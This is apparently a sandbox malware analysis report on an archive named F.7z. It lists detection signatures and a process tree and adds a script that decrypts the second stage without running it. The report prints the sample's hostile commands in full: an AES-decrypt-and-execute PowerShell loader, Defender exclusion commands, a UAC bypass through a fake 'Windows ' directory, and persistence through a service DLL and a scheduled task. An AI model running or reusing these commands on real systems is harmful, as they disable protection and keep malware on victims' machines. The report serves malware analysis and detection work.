Windows Analysis Report
F.7z

Overview

General Information

Sample name:F.7z
Analysis ID:1501605
MD5:5132591a35248a8d71171cb5f4343334
SHA1:78a0c5b34c107a68cad2d36424a6efbffac11412
SHA256:ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651
Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64_ra
  • OpenWith.exe (PID: 6944 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 6324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6092 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2480 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5912 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 1032 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4800 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • 7zFM.exe (PID: 4228 cmdline: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip" MD5: 30AC0B832D75598FB3EC37B6F2A8C86A)
  • wscript.exe (PID: 6276 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3840 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • explorer.exe (PID: 1532 cmdline: explorer "..\USB Drive" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • xcopy.exe (PID: 3268 cmdline: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • xcopy.exe (PID: 4436 cmdline: xcopy "x249569.dat" "C:\Windows \System32" /Y MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • printui.exe (PID: 2312 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 2328 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 2924 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 3588 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3740 cmdline: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5040 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6580 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7072 cmdline: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 1256 cmdline: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 752 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 1252 cmdline: sc start x338625 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 2276 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 3276 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 7D5124735B17F17AB3DACBA515C397F0)
            • cmd.exe (PID: 2104 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1532 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2516 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 2564 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6712 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1488 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • explorer.exe (PID: 2152 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 6412 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 2300 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1420 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5920 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6612 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'E:\';" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1100 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5020 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'F:\';" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
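The powershell.exe command line under the elevated printui.exe copy (PID 3740 in the tree above) is a self-contained decoder: it base64-decodes a blob, decrypts it with AES using a hard-coded 16-byte key and 16-byte IV (so AES-128; Aes.Create() in .NET defaults to CBC mode with PKCS7 padding, and the sample never changes either), and hands the UTF-8 plaintext to Invoke-Expression. That is the behaviour behind the "Yara detected Powershell decode and execute" and "PowerShell Base64 Encoded FromBase64String Cmdlet" hits. The block below is an added example and not part of the report: the same decryption with Invoke-Expression removed, so the second stage is written to a file for review instead of being run. Key, IV and ciphertext are copied from the command line in the report; the output file name is an assumption. Run it in an isolated analysis VM, since the recovered text is attacker-controlled.

```powershell
# Added example, not part of the Joe Sandbox report: recover the AES-encrypted
# second stage from the powershell.exe (PID 3740) command line without executing it.
# Key, IV and ciphertext are copied from the report; only the final
# Invoke-Expression is replaced by writing the plaintext out for review.

$b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'
$key = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4)
$iv  = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF)

function ConvertFrom-AesStage {
    param(
        [Parameter(Mandatory)][string]$CipherTextBase64,
        [Parameter(Mandatory)][byte[]]$Key,
        [Parameter(Mandatory)][byte[]]$IV
    )
    $cipher = [System.Convert]::FromBase64String($CipherTextBase64)

    # Sanity checks so a mangled copy/paste fails here rather than inside the crypto
    # provider: AES keys are 16/24/32 bytes, the IV is one 16-byte block, and CBC
    # input must be whole blocks (the report's blob is 192 base64 chars = 144 bytes).
    if ($Key.Length -notin 16, 24, 32) { throw "Key is $($Key.Length) bytes; expected 16, 24 or 32" }
    if ($IV.Length -ne 16)            { throw "IV is $($IV.Length) bytes; expected 16" }
    if ($cipher.Length % 16 -ne 0)    { throw "Ciphertext is $($cipher.Length) bytes; not a multiple of 16" }

    # Aes.Create() defaults to CBC with PKCS7 padding; the sample relies on that
    # default because it never sets Mode or Padding.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = $IV
    $dec = $aes.CreateDecryptor($aes.Key, $aes.IV)
    try {
        $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
        return [System.Text.Encoding]::UTF8.GetString($plain)
    } finally {
        $dec.Dispose()
        $aes.Dispose()
    }
}

$stage2 = ConvertFrom-AesStage -CipherTextBase64 $b64 -Key $key -IV $iv

# Write the recovered script with a .txt extension so nothing treats it as runnable
# (output path is an assumption). Do NOT pipe $stage2 into Invoke-Expression.
$outFile = Join-Path $env:TEMP 'stage2_decoded.txt'
Set-Content -LiteralPath $outFile -Value $stage2 -Encoding UTF8
Write-Host "Recovered $($stage2.Length) characters of second-stage PowerShell to $outFile"
$stage2
```

Because the ciphertext is 144 bytes and PKCS7 padding consumes at least one byte, the plaintext is at most 143 bytes, which is consistent with a short launcher rather than the whole payload; the next stages in this report are the separate commands printui.exe goes on to spawn (Defender exclusions, service creation, console_zero.exe).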
Source: Process Memory Space: powershell.exe PID: 3740
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x144c:$b2: ::FromBase64String(
  • 0xe8729:$b2: ::FromBase64String(
  • 0xe8aa6:$b2: ::FromBase64String(
  • 0xe931e:$b2: ::FromBase64String(
  • 0x1db56d:$b2: ::FromBase64String(
  • 0x1db8ea:$b2: ::FromBase64String(
  • 0x1de5fb:$b2: ::FromBase64String(
  • 0x1de97a:$b2: ::FromBase64String(
  • 0x1def01:$b2: ::FromBase64String(
  • 0x1df43b:$b2: ::FromBase64String(
  • 0x204c36:$b2: ::FromBase64String(
  • 0x28c966:$b2: ::FromBase64String(
  • 0x28ccd1:$b2: ::FromBase64String(
  • 0x290b2f:$b2: ::FromBase64String(
  • 0x291922:$b2: ::FromBase64String(
  • 0x2cfc83:$b2: ::FromBase64String(
  • 0x2d7e11:$b2: ::FromBase64String(
  • 0x32a7ec:$b2: ::FromBase64String(
  • 0x347f4c:$b2: ::FromBase64String(
  • 0x3482cd:$b2: ::FromBase64String(
  • 0x348778:$b2: ::FromBase64String(
Source: amsi64_3740.amsi.csv
Rule: JoeSecurity_PowershellDecodeAndExecute
Description: Yara detected Powershell decode and execute
Author: Joe Security

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2044, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 2312, ProcessName: printui.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine|base64offset|contains: , 
Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0
    Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 3276, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 2516, ProcessName: cmd.exe
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 5040, ProcessName: cmd.exe
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 1256, ProcessName: sc.exe
    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , ProcessId: 6276, ProcessName: wscript.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber | Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 804, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2152, ProcessName: explorer.exe
